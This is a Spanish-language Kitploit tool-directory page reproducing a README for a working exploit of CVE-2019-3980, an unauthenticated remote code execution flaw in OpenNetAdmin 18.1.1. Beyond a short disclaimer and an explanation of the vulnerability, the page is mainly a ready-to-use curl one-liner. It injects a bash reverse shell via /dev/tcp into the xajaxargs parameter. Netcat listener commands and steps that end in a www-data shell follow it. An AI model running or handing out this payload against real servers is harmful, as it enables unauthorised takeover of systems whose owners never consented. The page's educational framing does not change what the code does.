Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-3980-Open_Net_Admin_v18.1.1_RCE | Kitploit
Herramientas/GitHubGitHub/cyberquestor-infosec/cve-2019-3980-open_net_admin_v18.1.1_rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y Educación
GitHubcyberquestor-infosec/cve-2019-3980-open_net_admin_v18.1.1_rce

CVE-2019-3980-Open_Net_Admin_v18.1.1_RCE

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 1 añoAún no revisado

CVE-2019-3980 – OpenNetAdmin 18.1.1 Ejecución Remota de Código

⚠️ Aviso legal
Este repositorio está destinado estrictamente solo a fines educativos y de investigación.
La información y el código aquí proporcionados pueden utilizarse en entornos controlados, como máquinas de laboratorio privadas.
El uso no autorizado de este código contra sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal y poco ético.
El autor no es responsable de ningún uso indebido o daño causado.


🔍 Acerca de la vulnerabilidad

Existe una vulnerabilidad de ejecución remota de código en OpenNetAdmin 18.1.1 a través de la interfaz de solicitudes AJAX xajax.
La vulnerabilidad se debe a una sanitización incorrecta de las entradas, lo que permite la inyección de comandos mediante una solicitud POST manipulada a /ona/.
Este exploit aprovecha el plugin tooltips para lanzar una reverse shell de vuelta al listener del atacante.

  • ID CVE: CVE-2019-3980
  • ID Exploit-DB: 47691
  • Aplicación vulnerable: OpenNetAdmin 18.1.1
  • Parámetro afectado: xajaxargs[]
  • Impacto: Ejecución remota de código
  • Autenticación requerida: ❌ No
  • Acceso a red requerido: ✅ Sí

📂 Resumen del exploit

  • Tipo de exploit: Inyección de comandos → Reverse Shell
  • Título del exploit: OpenNetAdmin 18.1.1 – RCE sin autenticación
  • ID ExploitDB: 47691
  • Lenguaje: Bash (mediante curl)
  • Autenticación requerida: ❌ No

⚙️ Código del exploit

Este one-liner de Bash personalizado envía una solicitud POST al endpoint vulnerable xajax=window_submit con código de reverse shell inyectado.

root@kitploit:~
#!/bin/bash

curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<YOUR-IP>%2F<YOUR-PORT>%200%3E%261%22;echo \"END\"&xajaxargs[]=ping" "http://<TARGET-IP>/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

🛠️ Nota:
Reemplaza <YOUR-IP> y <YOUR-PORT> con la IP y el puerto de tu listener de Netcat.
Inicia tu listener usando:

root@kitploit:~
nc -nlvp <PORT>

🎯 Demostración

1. Mostrando la página web y la versión de ONA

Interfaz web de ONA

Captura de pantalla de la interfaz y la versión de OpenNetAdmin vulnerable.


🚀 Uso del exploit

2. Ejecutando el exploit

root@kitploit:~
bash shell.sh

Ejecución del exploit

Captura de pantalla de la ejecución del script que dispara el payload.


🐚 Reverse Shell

3. Reverse shell obtenida

root@kitploit:~
nc -nlvp <PORT>

Reverse Shell

Reverse shell capturada como www-data.


📚 Referencias

  • Exploit-DB: CVE-2019-3980
  • Información del CVE en NVD

📝 Blog en Medium

Consulta el análisis detallado y la teoría en mi publicación de Medium:
👉 Lee el blog en Medium

Descargar herramienta